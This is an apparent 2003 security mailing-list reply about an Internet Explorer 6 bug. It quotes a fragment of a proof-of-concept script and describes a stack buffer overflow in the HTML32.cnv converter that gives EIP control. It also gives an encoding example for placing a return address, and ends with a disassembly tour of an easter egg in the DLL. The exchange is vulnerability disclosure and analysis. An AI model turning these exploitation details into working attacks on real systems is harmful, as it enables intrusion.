In-Reply-To: <20030622005821.17280.qmail (at) www.securityfocus (dot) com [email concealed]>

><script>

> wnd=open("about:blank","","");

> wnd.moveTo(screen.Width,screen.Height);

> WndDoc=wnd.document;

> WndDoc.open();

This is a good one. Works for me on IE 6.0.2800.1106.xpsp2.

It's a stack based buffer overflow in HTML32.cnv which is a HTML

converter .DLL with a funny extension (it's in \Program Files\Common

Files\Microsoft Shared\TextConv). You can control EBP, EIP, and some

regs. The only twist is that the buffer is encoded before the overflow

occurs. The encoding appears to be something like UTF-8; high ASCII is

transformed into multi-byte sequences, low ASCII is truncated (?!). This

is only a problem for getting a useful EIP in there, and not a very big

one by any means.

I'm no unicode guru, so maybe someone else knows if this is consistent

with UTF-8:

buffer += "\xcc\x59\xfb\x77";

// becomes \xc3\x8c\x59\xc3\xbb\x57

As surreal side note, this DLL contains a strange easter egg:

.data:02344C94 aPresenting db 'Presenting',0 ; DATA XREF:

_EnsureDocClosure+2FCo

.data:02344C94 ;

_EnsureDocClosure+308o

.data:02344C9F align 4

.data:02344CA0 aTheAnansi db 'The Anansi',0 ; DATA XREF:

_EnsureDocClosure+3C9o

.data:02344CA0 ;

_EnsureDocClosure+3D5o

.data:02344CAB align 4

.data:02344CAC aAnansi db 'Anansi',0 ; DATA XREF:

_EnsureDocClosure+468o

.data:02344CB3 align 4

.data:02344CB4 aAnansiTheSpide db 'Anansi, the spider, is the chief

character in most Ghanaian '

.data:02344CB4 ; DATA XREF:

_EnsureDocClosure+4FFo

.data:02344CB4 ;

_EnsureDocClosure+50Bo

.data:02344CB4 db 'folk tales.',0

.data:02344CFC aGenerallyRegar db ' Generally regarded as crafty and

wise, he is often a maker '

.data:02344CFC ; DATA XREF:

_EnsureDocClosure+520o

.data:02344CFC ;

_EnsureDocClosure+52Co

.data:02344CFC db 'of mischief.',0

.data:02344D45 align 4

.data:02344D48 aHeSeeksToSweep db ' He seeks to sweep up all the wisdom

of the world in order t'

.data:02344D48 ; DATA XREF:

_EnsureDocClosure+541o

.data:02344D48 ;

_EnsureDocClosure+54Do

.data:02344D48 db 'o be the wisest of all.',0

.data:02344D9C aDevelopmentTea db ' Development Team',0 ; DATA XREF:

_EnsureDocClosure+5A9o

.data:02344D9C ;

_EnsureDocClosure+5B5o

Haven't figured out how to trigger it yet (just managed to find working

debug symbols for this DLL):

.text:02315420 _EnsureDocClosure proc near ; CODE XREF:

_ConvertForeignToRtf+E5p

.text:0231567D EasterEgg: ; CODE XREF:

_EnsureDocClosure+1FCj

Cheers,

~ol

[ reply ]